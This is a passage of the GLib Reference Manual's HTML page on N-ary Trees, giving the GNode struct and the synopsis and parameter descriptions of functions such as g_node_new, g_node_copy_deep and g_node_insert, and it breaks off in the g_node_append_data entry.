<td><a accesskey="u" href="glib-data-types.html"><img src="up.png" width="24" height="24" border="0" alt="Up"></a></td>
<td><a accesskey="h" href="index.html"><img src="home.png" width="24" height="24" border="0" alt="Home"></a></td>
<th width="100%" align="center">GLib Reference Manual</th>
<td><a accesskey="n" href="glib-Quarks.html"><img src="right.png" width="24" height="24" border="0" alt="Next"></a></td>
</tr>
<tr><td colspan="5" class="shortcuts"><nobr><a href="#id3199251" class="shortcut">Top</a>
 | 
<a href="#id3200294" class="shortcut">Description</a></nobr></td></tr>
</table>
<div class="refentry" lang="en">
<a name="glib-N-ary-Trees"></a><div class="titlepage"></div>
<div class="refnamediv"><table width="100%"><tr>
<td valign="top">
<h2>
<a name="id3199251"></a><span class="refentrytitle">N-ary Trees</span>
</h2>
<p>N-ary Trees — trees of data with any number of branches.</p>
</td>
<td valign="top" align="right"></td>
</tr></table></div>
<div class="refsynopsisdiv">
<h2>Synopsis</h2>
<pre class="synopsis">
#include <glib.h>
<a href="glib-N-ary-Trees.html#GNode">GNode</a>;
<a href="glib-N-ary-Trees.html#GNode">GNode</a>* <a href="glib-N-ary-Trees.html#g-node-new">g_node_new</a> (<a href="glib-Basic-Types.html#gpointer">gpointer</a> data);
<a href="glib-N-ary-Trees.html#GNode">GNode</a>* <a href="glib-N-ary-Trees.html#g-node-copy">g_node_copy</a> (<a href="glib-N-ary-Trees.html#GNode">GNode</a> *node);
<a href="glib-Basic-Types.html#gpointer">gpointer</a> (<a href="glib-N-ary-Trees.html#GCopyFunc">*GCopyFunc</a>) (<a href="glib-Basic-Types.html#gconstpointer">gconstpointer</a> src,
<a href="glib-Basic-Types.html#gpointer">gpointer</a> data);
<a href="glib-N-ary-Trees.html#GNode">GNode</a>* <a href="glib-N-ary-Trees.html#g-node-copy-deep">g_node_copy_deep</a> (<a href="glib-N-ary-Trees.html#GNode">GNode</a> *node,
<a href="glib-N-ary-Trees.html#GCopyFunc">GCopyFunc</a> copy_func,
<a href="glib-Basic-Types.html#gpointer">gpointer</a> data);
<a href="glib-N-ary-Trees.html#GNode">GNode</a>* <a href="glib-N-ary-Trees.html#g-node-insert">g_node_insert</a> (<a href="glib-N-ary-Trees.html#GNode">GNode</a> *parent,
<a href="glib-Basic-Types.html#gint">gint</a> position,
<a href="glib-N-ary-Trees.html#GNode">GNode</a> *node);
<a href="glib-N-ary-Trees.html#GNode">GNode</a>* <a href="glib-N-ary-Trees.html#g-node-insert-before">g_node_insert_before</a> (<a href="glib-N-ary-Trees.html#GNode">GNode</a> *parent,
<a href="glib-N-ary-Trees.html#GNode">GNode</a> *sibling,
<a href="glib-N-ary-Trees.html#GNode">GNode</a> *node);
<a href="glib-N-ary-Trees.html#GNode">GNode</a>* <a href="glib-N-ary-Trees.html#g-node-insert-after">g_node_insert_after</a> (<a href="glib-N-ary-Trees.html#GNode">GNode</a> *parent,
<a href="glib-N-ary-Trees.html#GNode">GNode</a> *sibling,
<a href="glib-N-ary-Trees.html#GNode">GNode</a> *node);
#define <a href="glib-N-ary-Trees.html#g-node-append">g_node_append</a> (parent, node)
<a href="glib-N-ary-Trees.html#GNode">GNode</a>* <a href="glib-N-ary-Trees.html#g-node-prepend">g_node_prepend</a> (<a href="glib-N-ary-Trees.html#GNode">GNode</a> *parent,
<a href="glib-N-ary-Trees.html#GNode">GNode</a> *node);
#define <a href="glib-N-ary-Trees.html#g-node-insert-data">g_node_insert_data</a> (parent, position, data)
#define <a href="glib-N-ary-Trees.html#g-node-insert-data-before">g_node_insert_data_before</a> (parent, sibling, data)
#define <a href="glib-N-ary-Trees.html#g-node-append-data">g_node_append_data</a> (parent, data)
#define <a href="glib-N-ary-Trees.html#g-node-prepend-data">g_node_prepend_data</a> (parent, data)
void <a href="glib-N-ary-Trees.html#g-node-reverse-children">g_node_reverse_children</a> (<a href="glib-N-ary-Trees.html#GNode">GNode</a> *node);
void <a href="glib-N-ary-Trees.html#g-node-traverse">g_node_traverse</a> (<a href="glib-N-ary-Trees.html#GNode">GNode</a> *root,
<a href="glib-Balanced-Binary-Trees.html#GTraverseType">GTraverseType</a> order,
<a href="glib-N-ary-Trees.html#GTraverseFlags">GTraverseFlags</a> flags,
<a href="glib-Basic-Types.html#gint">gint</a> max_depth,
<a href="glib-N-ary-Trees.html#GNodeTraverseFunc">GNodeTraverseFunc</a> func,
<a href="glib-Basic-Types.html#gpointer">gpointer</a> data);
enum <a href="glib-N-ary-Trees.html#GTraverseFlags">GTraverseFlags</a>;
<a href="glib-Basic-Types.html#gboolean">gboolean</a> (<a href="glib-N-ary-Trees.html#GNodeTraverseFunc">*GNodeTraverseFunc</a>) (<a href="glib-N-ary-Trees.html#GNode">GNode</a> *node,
<a href="glib-Basic-Types.html#gpointer">gpointer</a> data);
void <a href="glib-N-ary-Trees.html#g-node-children-foreach">g_node_children_foreach</a> (<a href="glib-N-ary-Trees.html#GNode">GNode</a> *node,
<a href="glib-N-ary-Trees.html#GTraverseFlags">GTraverseFlags</a> flags,
<a href="glib-N-ary-Trees.html#GNodeForeachFunc">GNodeForeachFunc</a> func,
<a href="glib-Basic-Types.html#gpointer">gpointer</a> data);
void (<a href="glib-N-ary-Trees.html#GNodeForeachFunc">*GNodeForeachFunc</a>) (<a href="glib-N-ary-Trees.html#GNode">GNode</a> *node,
<a href="glib-Basic-Types.html#gpointer">gpointer</a> data);
<a href="glib-N-ary-Trees.html#GNode">GNode</a>* <a href="glib-N-ary-Trees.html#g-node-get-root">g_node_get_root</a> (<a href="glib-N-ary-Trees.html#GNode">GNode</a> *node);
<a href="glib-N-ary-Trees.html#GNode">GNode</a>* <a href="glib-N-ary-Trees.html#g-node-find">g_node_find</a> (<a href="glib-N-ary-Trees.html#GNode">GNode</a> *root,
<a href="glib-Balanced-Binary-Trees.html#GTraverseType">GTraverseType</a> order,
<a href="glib-N-ary-Trees.html#GTraverseFlags">GTraverseFlags</a> flags,
<a href="glib-Basic-Types.html#gpointer">gpointer</a> data);
<a href="glib-N-ary-Trees.html#GNode">GNode</a>* <a href="glib-N-ary-Trees.html#g-node-find-child">g_node_find_child</a> (<a href="glib-N-ary-Trees.html#GNode">GNode</a> *node,
<a href="glib-N-ary-Trees.html#GTraverseFlags">GTraverseFlags</a> flags,
<a href="glib-Basic-Types.html#gpointer">gpointer</a> data);
<a href="glib-Basic-Types.html#gint">gint</a> <a href="glib-N-ary-Trees.html#g-node-child-index">g_node_child_index</a> (<a href="glib-N-ary-Trees.html#GNode">GNode</a> *node,
<a href="glib-Basic-Types.html#gpointer">gpointer</a> data);
<a href="glib-Basic-Types.html#gint">gint</a> <a href="glib-N-ary-Trees.html#g-node-child-position">g_node_child_position</a> (<a href="glib-N-ary-Trees.html#GNode">GNode</a> *node,
<a href="glib-N-ary-Trees.html#GNode">GNode</a> *child);
#define <a href="glib-N-ary-Trees.html#g-node-first-child">g_node_first_child</a> (node)
<a href="glib-N-ary-Trees.html#GNode">GNode</a>* <a href="glib-N-ary-Trees.html#g-node-last-child">g_node_last_child</a> (<a href="glib-N-ary-Trees.html#GNode">GNode</a> *node);
<a href="glib-N-ary-Trees.html#GNode">GNode</a>* <a href="glib-N-ary-Trees.html#g-node-nth-child">g_node_nth_child</a> (<a href="glib-N-ary-Trees.html#GNode">GNode</a> *node,
<a href="glib-Basic-Types.html#guint">guint</a> n);
<a href="glib-N-ary-Trees.html#GNode">GNode</a>* <a href="glib-N-ary-Trees.html#g-node-first-sibling">g_node_first_sibling</a> (<a href="glib-N-ary-Trees.html#GNode">GNode</a> *node);
#define <a href="glib-N-ary-Trees.html#g-node-next-sibling">g_node_next_sibling</a> (node)
#define <a href="glib-N-ary-Trees.html#g-node-prev-sibling">g_node_prev_sibling</a> (node)
<a href="glib-N-ary-Trees.html#GNode">GNode</a>* <a href="glib-N-ary-Trees.html#g-node-last-sibling">g_node_last_sibling</a> (<a href="glib-N-ary-Trees.html#GNode">GNode</a> *node);
#define <a href="glib-N-ary-Trees.html#G-NODE-IS-LEAF:CAPS">G_NODE_IS_LEAF</a> (node)
#define <a href="glib-N-ary-Trees.html#G-NODE-IS-ROOT:CAPS">G_NODE_IS_ROOT</a> (node)
<a href="glib-Basic-Types.html#guint">guint</a> <a href="glib-N-ary-Trees.html#g-node-depth">g_node_depth</a> (<a href="glib-N-ary-Trees.html#GNode">GNode</a> *node);
<a href="glib-Basic-Types.html#guint">guint</a> <a href="glib-N-ary-Trees.html#g-node-n-nodes">g_node_n_nodes</a> (<a href="glib-N-ary-Trees.html#GNode">GNode</a> *root,
<a href="glib-N-ary-Trees.html#GTraverseFlags">GTraverseFlags</a> flags);
<a href="glib-Basic-Types.html#guint">guint</a> <a href="glib-N-ary-Trees.html#g-node-n-children">g_node_n_children</a> (<a href="glib-N-ary-Trees.html#GNode">GNode</a> *node);
<a href="glib-Basic-Types.html#gboolean">gboolean</a> <a href="glib-N-ary-Trees.html#g-node-is-ancestor">g_node_is_ancestor</a> (<a href="glib-N-ary-Trees.html#GNode">GNode</a> *node,
<a href="glib-N-ary-Trees.html#GNode">GNode</a> *descendant);
<a href="glib-Basic-Types.html#guint">guint</a> <a href="glib-N-ary-Trees.html#g-node-max-height">g_node_max_height</a> (<a href="glib-N-ary-Trees.html#GNode">GNode</a> *root);
void <a href="glib-N-ary-Trees.html#g-node-unlink">g_node_unlink</a> (<a href="glib-N-ary-Trees.html#GNode">GNode</a> *node);
void <a href="glib-N-ary-Trees.html#g-node-destroy">g_node_destroy</a> (<a href="glib-N-ary-Trees.html#GNode">GNode</a> *root);
void <a href="glib-N-ary-Trees.html#g-node-push-allocator">g_node_push_allocator</a> (<a href="glib-Basic-Types.html#gpointer">gpointer</a> dummy);
void <a href="glib-N-ary-Trees.html#g-node-pop-allocator">g_node_pop_allocator</a> (void);
</pre>
</div>
<div class="refsect1" lang="en">
<a name="id3200294"></a><h2>Description</h2>
<p>
The <a href="glib-N-ary-Trees.html#GNode"><span class="type">GNode</span></a> struct and its associated functions provide a N-ary tree data
structure, where nodes in the tree can contain arbitrary data.
</p>
<p>
To create a new tree use <a href="glib-N-ary-Trees.html#g-node-new"><code class="function">g_node_new()</code></a>.
</p>
<p>
To insert a node into a tree use <a href="glib-N-ary-Trees.html#g-node-insert"><code class="function">g_node_insert()</code></a>, <a href="glib-N-ary-Trees.html#g-node-insert-before"><code class="function">g_node_insert_before()</code></a>,
<a href="glib-N-ary-Trees.html#g-node-append"><code class="function">g_node_append()</code></a> and <a href="glib-N-ary-Trees.html#g-node-prepend"><code class="function">g_node_prepend()</code></a>.
</p>
<p>
To create a new node and insert it into a tree use <a href="glib-N-ary-Trees.html#g-node-insert-data"><code class="function">g_node_insert_data()</code></a>,
<a href="glib-N-ary-Trees.html#g-node-insert-data-before"><code class="function">g_node_insert_data_before()</code></a>, <a href="glib-N-ary-Trees.html#g-node-append-data"><code class="function">g_node_append_data()</code></a> and <a href="glib-N-ary-Trees.html#g-node-prepend-data"><code class="function">g_node_prepend_data()</code></a>.
</p>
<p>
To reverse the children of a node use <a href="glib-N-ary-Trees.html#g-node-reverse-children"><code class="function">g_node_reverse_children()</code></a>.
</p>
<p>
To find a node use <a href="glib-N-ary-Trees.html#g-node-get-root"><code class="function">g_node_get_root()</code></a>, <a href="glib-N-ary-Trees.html#g-node-find"><code class="function">g_node_find()</code></a>, <a href="glib-N-ary-Trees.html#g-node-find-child"><code class="function">g_node_find_child()</code></a>,
<a href="glib-N-ary-Trees.html#g-node-child-index"><code class="function">g_node_child_index()</code></a>, <a href="glib-N-ary-Trees.html#g-node-child-position"><code class="function">g_node_child_position()</code></a>,
<a href="glib-N-ary-Trees.html#g-node-first-child"><code class="function">g_node_first_child()</code></a>, <a href="glib-N-ary-Trees.html#g-node-last-child"><code class="function">g_node_last_child()</code></a>,
<a href="glib-N-ary-Trees.html#g-node-nth-child"><code class="function">g_node_nth_child()</code></a>, <a href="glib-N-ary-Trees.html#g-node-first-sibling"><code class="function">g_node_first_sibling()</code></a>, <a href="glib-N-ary-Trees.html#g-node-prev-sibling"><code class="function">g_node_prev_sibling()</code></a>,
<a href="glib-N-ary-Trees.html#g-node-next-sibling"><code class="function">g_node_next_sibling()</code></a> or <a href="glib-N-ary-Trees.html#g-node-last-sibling"><code class="function">g_node_last_sibling()</code></a>.
</p>
<p>
To get information about a node or tree use <a href="glib-N-ary-Trees.html#G-NODE-IS-LEAF:CAPS"><code class="function">G_NODE_IS_LEAF()</code></a>,
<a href="glib-N-ary-Trees.html#G-NODE-IS-ROOT:CAPS"><code class="function">G_NODE_IS_ROOT()</code></a>, <a href="glib-N-ary-Trees.html#g-node-depth"><code class="function">g_node_depth()</code></a>, <a href="glib-N-ary-Trees.html#g-node-n-nodes"><code class="function">g_node_n_nodes()</code></a>, <a href="glib-N-ary-Trees.html#g-node-n-children"><code class="function">g_node_n_children()</code></a>,
<a href="glib-N-ary-Trees.html#g-node-is-ancestor"><code class="function">g_node_is_ancestor()</code></a> or <a href="glib-N-ary-Trees.html#g-node-max-height"><code class="function">g_node_max_height()</code></a>.
</p>
<p>
To traverse a tree, calling a function for each node visited in the
traversal, use <a href="glib-N-ary-Trees.html#g-node-traverse"><code class="function">g_node_traverse()</code></a> or <a href="glib-N-ary-Trees.html#g-node-children-foreach"><code class="function">g_node_children_foreach()</code></a>.
</p>
<p>
To remove a node or subtree from a tree use <a href="glib-N-ary-Trees.html#g-node-unlink"><code class="function">g_node_unlink()</code></a> or
<a href="glib-N-ary-Trees.html#g-node-destroy"><code class="function">g_node_destroy()</code></a>.
</p>
</div>
<div class="refsect1" lang="en">
<a name="id3200699"></a><h2>Details</h2>
<div class="refsect2" lang="en">
<a name="id3200710"></a><h3>
<a name="GNode"></a>GNode</h3>
<a class="indexterm" name="id3200722"></a><pre class="programlisting">typedef struct {
gpointer data;
GNode *next;
GNode *prev;
GNode *parent;
GNode *children;
} GNode;
</pre>
<p>
The <span class="structname">GNode</span> struct represents one node in a
<a href="glib-N-ary-Trees.html" title="N-ary Trees">N-ary Tree</a>.
The <em class="structfield"><code>data</code></em> field contains the actual data of the node.
The <em class="structfield"><code>next</code></em> and <em class="structfield"><code>prev</code></em>
fields point to the node's siblings (a sibling is another <span class="structname">GNode</span> with the
same parent).
The <em class="structfield"><code>parent</code></em> field points to the parent of the <span class="structname">GNode</span>,
or is <a href="glib-Standard-Macros.html#NULL:CAPS"><code class="literal">NULL</code></a> if the <span class="structname">GNode</span> is the root of the tree.
The <em class="structfield"><code>children</code></em> field points to the first child of the
<span class="structname">GNode</span>. The other children are accessed by using the
<em class="structfield"><code>next</code></em> pointer of each child.
</p>
</div>
<hr>
<div class="refsect2" lang="en">
<a name="id3200802"></a><h3>
<a name="g-node-new"></a>g_node_new ()</h3>
<a class="indexterm" name="id3200814"></a><pre class="programlisting"><a href="glib-N-ary-Trees.html#GNode">GNode</a>* g_node_new (<a href="glib-Basic-Types.html#gpointer">gpointer</a> data);</pre>
<p>
Creates a new <a href="glib-N-ary-Trees.html#GNode"><span class="type">GNode</span></a> containing the given data.
Used to create the first node in a tree.
</p>
<div class="variablelist"><table border="0">
<col align="left" valign="top">
<tbody>
<tr>
<td><span class="term"><em class="parameter"><code>data</code></em> :</span></td>
<td>the data of the new node.
</td>
</tr>
<tr>
<td><span class="term"><span class="emphasis"><em>Returns</em></span> :</span></td>
<td>a new <a href="glib-N-ary-Trees.html#GNode"><span class="type">GNode</span></a>.
</td>
</tr>
</tbody>
</table></div>
</div>
<hr>
<div class="refsect2" lang="en">
<a name="id3200888"></a><h3>
<a name="g-node-copy"></a>g_node_copy ()</h3>
<a class="indexterm" name="id3200901"></a><pre class="programlisting"><a href="glib-N-ary-Trees.html#GNode">GNode</a>* g_node_copy (<a href="glib-N-ary-Trees.html#GNode">GNode</a> *node);</pre>
<p>
Recursively copies a <a href="glib-N-ary-Trees.html#GNode"><span class="type">GNode</span></a> (but does not deep-copy the data inside the nodes,
see <a href="glib-N-ary-Trees.html#g-node-copy-deep"><code class="function">g_node_copy_deep()</code></a> if you need that).
</p>
<div class="variablelist"><table border="0">
<col align="left" valign="top">
<tbody>
<tr>
<td><span class="term"><em class="parameter"><code>node</code></em> :</span></td>
<td>a <a href="glib-N-ary-Trees.html#GNode"><span class="type">GNode</span></a>.
</td>
</tr>
<tr>
<td><span class="term"><span class="emphasis"><em>Returns</em></span> :</span></td>
<td>a new <a href="glib-N-ary-Trees.html#GNode"><span class="type">GNode</span></a> containing the same data pointers.
</td>
</tr>
</tbody>
</table></div>
</div>
<hr>
<div class="refsect2" lang="en">
<a name="id3200993"></a><h3>
<a name="GCopyFunc"></a>GCopyFunc ()</h3>
<a class="indexterm" name="id3201008"></a><pre class="programlisting"><a href="glib-Basic-Types.html#gpointer">gpointer</a> (*GCopyFunc) (<a href="glib-Basic-Types.html#gconstpointer">gconstpointer</a> src,
<a href="glib-Basic-Types.html#gpointer">gpointer</a> data);</pre>
<p>
A function of this signature is used to copy the node data when doing a deep-copy
of a tree.
</p>
<div class="variablelist"><table border="0">
<col align="left" valign="top">
<tbody>
<tr>
<td><span class="term"><em class="parameter"><code>src</code></em> :</span></td>
<td>A pointer to the data which should be copied.
</td>
</tr>
<tr>
<td><span class="term"><em class="parameter"><code>data</code></em> :</span></td>
<td>Additional data.
</td>
</tr>
<tr>
<td><span class="term"><span class="emphasis"><em>Returns</em></span> :</span></td>
<td>A pointer to the copy.
</td>
</tr>
</tbody>
</table></div>
<p class="since">Since 2.4
</p>
</div>
<hr>
<div class="refsect2" lang="en">
<a name="id3201096"></a><h3>
<a name="g-node-copy-deep"></a>g_node_copy_deep ()</h3>
<a class="indexterm" name="id3201110"></a><pre class="programlisting"><a href="glib-N-ary-Trees.html#GNode">GNode</a>* g_node_copy_deep (<a href="glib-N-ary-Trees.html#GNode">GNode</a> *node,
<a href="glib-N-ary-Trees.html#GCopyFunc">GCopyFunc</a> copy_func,
<a href="glib-Basic-Types.html#gpointer">gpointer</a> data);</pre>
<p>
Recursively copies a <a href="glib-N-ary-Trees.html#GNode"><span class="type">GNode</span></a> and its data.</p>
<p>
</p>
<div class="variablelist"><table border="0">
<col align="left" valign="top">
<tbody>
<tr>
<td><span class="term"><em class="parameter"><code>node</code></em> :</span></td>
<td> a <a href="glib-N-ary-Trees.html#GNode"><span class="type">GNode</span></a>
</td>
</tr>
<tr>
<td><span class="term"><em class="parameter"><code>copy_func</code></em> :</span></td>
<td> the function which is called to copy the data inside each node,
or <a href="glib-Standard-Macros.html#NULL:CAPS"><code class="literal">NULL</code></a> to use the original data.
</td>
</tr>
<tr>
<td><span class="term"><em class="parameter"><code>data</code></em> :</span></td>
<td> data to pass to <em class="parameter"><code>copy_func</code></em>
</td>
</tr>
<tr>
<td><span class="term"><span class="emphasis"><em>Returns</em></span> :</span></td>
<td> a new <a href="glib-N-ary-Trees.html#GNode"><span class="type">GNode</span></a> containing copies of the data in <em class="parameter"><code>node</code></em>.
</td>
</tr>
</tbody>
</table></div>
<p class="since">Since 2.4
</p>
</div>
<hr>
<div class="refsect2" lang="en">
<a name="id3201267"></a><h3>
<a name="g-node-insert"></a>g_node_insert ()</h3>
<a class="indexterm" name="id3201280"></a><pre class="programlisting"><a href="glib-N-ary-Trees.html#GNode">GNode</a>* g_node_insert (<a href="glib-N-ary-Trees.html#GNode">GNode</a> *parent,
<a href="glib-Basic-Types.html#gint">gint</a> position,
<a href="glib-N-ary-Trees.html#GNode">GNode</a> *node);</pre>
<p>
Inserts a <a href="glib-N-ary-Trees.html#GNode"><span class="type">GNode</span></a> beneath the parent at the given position.
</p>
<div class="variablelist"><table border="0">
<col align="left" valign="top">
<tbody>
<tr>
<td><span class="term"><em class="parameter"><code>parent</code></em> :</span></td>
<td>the <a href="glib-N-ary-Trees.html#GNode"><span class="type">GNode</span></a> to place <em class="parameter"><code>node</code></em> under.
</td>
</tr>
<tr>
<td><span class="term"><em class="parameter"><code>position</code></em> :</span></td>
<td>the position to place <em class="parameter"><code>node</code></em> at, with respect to its siblings.
If position is -1, <em class="parameter"><code>node</code></em> is inserted as the last child of <em class="parameter"><code>parent</code></em>.
</td>
</tr>
<tr>
<td><span class="term"><em class="parameter"><code>node</code></em> :</span></td>
<td>the <a href="glib-N-ary-Trees.html#GNode"><span class="type">GNode</span></a> to insert.
</td>
</tr>
<tr>
<td><span class="term"><span class="emphasis"><em>Returns</em></span> :</span></td>
<td>the inserted <a href="glib-N-ary-Trees.html#GNode"><span class="type">GNode</span></a>.
</td>
</tr>
</tbody>
</table></div>
</div>
<hr>
<div class="refsect2" lang="en">
<a name="id3201438"></a><h3>
<a name="g-node-insert-before"></a>g_node_insert_before ()</h3>
<a class="indexterm" name="id3201451"></a><pre class="programlisting"><a href="glib-N-ary-Trees.html#GNode">GNode</a>* g_node_insert_before (<a href="glib-N-ary-Trees.html#GNode">GNode</a> *parent,
<a href="glib-N-ary-Trees.html#GNode">GNode</a> *sibling,
<a href="glib-N-ary-Trees.html#GNode">GNode</a> *node);</pre>
<p>
Inserts a <a href="glib-N-ary-Trees.html#GNode"><span class="type">GNode</span></a> beneath the parent before the given sibling.
</p>
<div class="variablelist"><table border="0">
<col align="left" valign="top">
<tbody>
<tr>
<td><span class="term"><em class="parameter"><code>parent</code></em> :</span></td>
<td>the <a href="glib-N-ary-Trees.html#GNode"><span class="type">GNode</span></a> to place <em class="parameter"><code>node</code></em> under.
</td>
</tr>
<tr>
<td><span class="term"><em class="parameter"><code>sibling</code></em> :</span></td>
<td>the sibling <a href="glib-N-ary-Trees.html#GNode"><span class="type">GNode</span></a> to place <em class="parameter"><code>node</code></em> before. If sibling is <a href="glib-Standard-Macros.html#NULL:CAPS"><code class="literal">NULL</code></a>,
the node is inserted as the last child of <em class="parameter"><code>parent</code></em>.
</td>
</tr>
<tr>
<td><span class="term"><em class="parameter"><code>node</code></em> :</span></td>
<td>the <a href="glib-N-ary-Trees.html#GNode"><span class="type">GNode</span></a> to insert.
</td>
</tr>
<tr>
<td><span class="term"><span class="emphasis"><em>Returns</em></span> :</span></td>
<td>the inserted <a href="glib-N-ary-Trees.html#GNode"><span class="type">GNode</span></a>.
</td>
</tr>
</tbody>
</table></div>
</div>
<hr>
<div class="refsect2" lang="en">
<a name="id3201621"></a><h3>
<a name="g-node-insert-after"></a>g_node_insert_after ()</h3>
<a class="indexterm" name="id3201635"></a><pre class="programlisting"><a href="glib-N-ary-Trees.html#GNode">GNode</a>* g_node_insert_after (<a href="glib-N-ary-Trees.html#GNode">GNode</a> *parent,
<a href="glib-N-ary-Trees.html#GNode">GNode</a> *sibling,
<a href="glib-N-ary-Trees.html#GNode">GNode</a> *node);</pre>
<p>
Inserts a <a href="glib-N-ary-Trees.html#GNode"><span class="type">GNode</span></a> beneath the parent after the given sibling.
</p>
<div class="variablelist"><table border="0">
<col align="left" valign="top">
<tbody>
<tr>
<td><span class="term"><em class="parameter"><code>parent</code></em> :</span></td>
<td>the <a href="glib-N-ary-Trees.html#GNode"><span class="type">GNode</span></a> to place <em class="parameter"><code>node</code></em> under.
</td>
</tr>
<tr>
<td><span class="term"><em class="parameter"><code>sibling</code></em> :</span></td>
<td>the sibling <a href="glib-N-ary-Trees.html#GNode"><span class="type">GNode</span></a> to place <em class="parameter"><code>node</code></em> after. If sibling is <a href="glib-Standard-Macros.html#NULL:CAPS"><code class="literal">NULL</code></a>,
the node is inserted as the first child of <em class="parameter"><code>parent</code></em>.
</td>
</tr>
<tr>
<td><span class="term"><em class="parameter"><code>node</code></em> :</span></td>
<td>the <a href="glib-N-ary-Trees.html#GNode"><span class="type">GNode</span></a> to insert.
</td>
</tr>
<tr>
<td><span class="term"><span class="emphasis"><em>Returns</em></span> :</span></td>
<td>the inserted <a href="glib-N-ary-Trees.html#GNode"><span class="type">GNode</span></a>.
</td>
</tr>
</tbody>
</table></div>
</div>
<hr>
<div class="refsect2" lang="en">
<a name="id3201804"></a><h3>
<a name="g-node-append"></a>g_node_append()</h3>
<a class="indexterm" name="id3201817"></a><pre class="programlisting">#define g_node_append(parent, node)</pre>
<p>
Inserts a <a href="glib-N-ary-Trees.html#GNode"><span class="type">GNode</span></a> as the last child of the given parent.
</p>
<div class="variablelist"><table border="0">
<col align="left" valign="top">
<tbody>
<tr>
<td><span class="term"><em class="parameter"><code>parent</code></em> :</span></td>
<td>the <a href="glib-N-ary-Trees.html#GNode"><span class="type">GNode</span></a> to place the new <a href="glib-N-ary-Trees.html#GNode"><span class="type">GNode</span></a> under.
</td>
</tr>
<tr>
<td><span class="term"><em class="parameter"><code>node</code></em> :</span></td>
<td>the <a href="glib-N-ary-Trees.html#GNode"><span class="type">GNode</span></a> to insert.
</td>
</tr>
<tr>
<td><span class="term"><span class="emphasis"><em>Returns</em></span> :</span></td>
<td>the inserted <a href="glib-N-ary-Trees.html#GNode"><span class="type">GNode</span></a>.
</td>
</tr>
</tbody>
</table></div>
</div>
<hr>
<div class="refsect2" lang="en">
<a name="id3201916"></a><h3>
<a name="g-node-prepend"></a>g_node_prepend ()</h3>
<a class="indexterm" name="id3201928"></a><pre class="programlisting"><a href="glib-N-ary-Trees.html#GNode">GNode</a>* g_node_prepend (<a href="glib-N-ary-Trees.html#GNode">GNode</a> *parent,
<a href="glib-N-ary-Trees.html#GNode">GNode</a> *node);</pre>
<p>
Inserts a <a href="glib-N-ary-Trees.html#GNode"><span class="type">GNode</span></a> as the first child of the given parent.
</p>
<div class="variablelist"><table border="0">
<col align="left" valign="top">
<tbody>
<tr>
<td><span class="term"><em class="parameter"><code>parent</code></em> :</span></td>
<td>the <a href="glib-N-ary-Trees.html#GNode"><span class="type">GNode</span></a> to place the new <a href="glib-N-ary-Trees.html#GNode"><span class="type">GNode</span></a> under.
</td>
</tr>
<tr>
<td><span class="term"><em class="parameter"><code>node</code></em> :</span></td>
<td>the <a href="glib-N-ary-Trees.html#GNode"><span class="type">GNode</span></a> to insert.
</td>
</tr>
<tr>
<td><span class="term"><span class="emphasis"><em>Returns</em></span> :</span></td>
<td>the inserted <a href="glib-N-ary-Trees.html#GNode"><span class="type">GNode</span></a>.
</td>
</tr>
</tbody>
</table></div>
</div>
<hr>
<div class="refsect2" lang="en">
<a name="id3202048"></a><h3>
<a name="g-node-insert-data"></a>g_node_insert_data()</h3>
<a class="indexterm" name="id3202061"></a><pre class="programlisting">#define g_node_insert_data(parent, position, data)</pre>
<p>
Inserts a new <a href="glib-N-ary-Trees.html#GNode"><span class="type">GNode</span></a> at the given position.
</p>
<div class="variablelist"><table border="0">
<col align="left" valign="top">
<tbody>
<tr>
<td><span class="term"><em class="parameter"><code>parent</code></em> :</span></td>
<td>the <a href="glib-N-ary-Trees.html#GNode"><span class="type">GNode</span></a> to place the new <a href="glib-N-ary-Trees.html#GNode"><span class="type">GNode</span></a> under.
</td>
</tr>
<tr>
<td><span class="term"><em class="parameter"><code>position</code></em> :</span></td>
<td>the position to place the new <a href="glib-N-ary-Trees.html#GNode"><span class="type">GNode</span></a> at.
If position is -1, the new <a href="glib-N-ary-Trees.html#GNode"><span class="type">GNode</span></a> is inserted as the last child of <em class="parameter"><code>parent</code></em>.
</td>
</tr>
<tr>
<td><span class="term"><em class="parameter"><code>data</code></em> :</span></td>
<td>the data for the new <a href="glib-N-ary-Trees.html#GNode"><span class="type">GNode</span></a>.
</td>
</tr>
<tr>
<td><span class="term"><span class="emphasis"><em>Returns</em></span> :</span></td>
<td>the new <a href="glib-N-ary-Trees.html#GNode"><span class="type">GNode</span></a>.
</td>
</tr>
</tbody>
</table></div>
</div>
<hr>
<div class="refsect2" lang="en">
<a name="id3202196"></a><h3>
<a name="g-node-insert-data-before"></a>g_node_insert_data_before()</h3>
<a class="indexterm" name="id3202209"></a><pre class="programlisting">#define g_node_insert_data_before(parent, sibling, data)</pre>
<p>
Inserts a new <a href="glib-N-ary-Trees.html#GNode"><span class="type">GNode</span></a> before the given sibling.
</p>
<div class="variablelist"><table border="0">
<col align="left" valign="top">
<tbody>
<tr>
<td><span class="term"><em class="parameter"><code>parent</code></em> :</span></td>
<td>the <a href="glib-N-ary-Trees.html#GNode"><span class="type">GNode</span></a> to place the new <a href="glib-N-ary-Trees.html#GNode"><span class="type">GNode</span></a> under.
</td>
</tr>
<tr>
<td><span class="term"><em class="parameter"><code>sibling</code></em> :</span></td>
<td>the sibling <a href="glib-N-ary-Trees.html#GNode"><span class="type">GNode</span></a> to place the new <a href="glib-N-ary-Trees.html#GNode"><span class="type">GNode</span></a> before.
</td>
</tr>
<tr>
<td><span class="term"><em class="parameter"><code>data</code></em> :</span></td>
<td>the data for the new <a href="glib-N-ary-Trees.html#GNode"><span class="type">GNode</span></a>.
</td>
</tr>
<tr>
<td><span class="term"><span class="emphasis"><em>Returns</em></span> :</span></td>
<td>the new <a href="glib-N-ary-Trees.html#GNode"><span class="type">GNode</span></a>.
</td>
</tr>
</tbody>
</table></div>
</div>
<hr>
<div class="refsect2" lang="en">
<a name="id3202338"></a><h3>
<a name="g-node-append-data"></a>g_node_append_data()</h3>
<a class="indexterm" name="id3202351"></a><pre class="programlisting">#define g_node_append_data(parent, data)</pre>
<p>
Inserts a new <a href="glib-N-ary-Trees.html#GNode"><span class="type">GNode</span></a> as the last child of the given parent.
</p>
<div class="variablelist"><table border="0">
<col align="left" valign="top">
<tbody>
<tr>
<td><span class="term"><em class="parameter"><code>parent</code></em> :</span></td>
<td>the <a href="glib-N-ary-Trees.html#GNode"><span class="type">GNode</span></a> to place the new <a href="glib-N-ary-Trees.html#GNode"><span class="type">GNode</span></a> under.
</td>
</tr>
<tr>
<td><span class="term"><em class="parameter"><code>data</code></em> :</span></td>
<td>the data for the new <a href="glib-N-ary-Trees.html#GNode"><span class="type">GNode</span></a>.
</td>
</tr>
<tr>
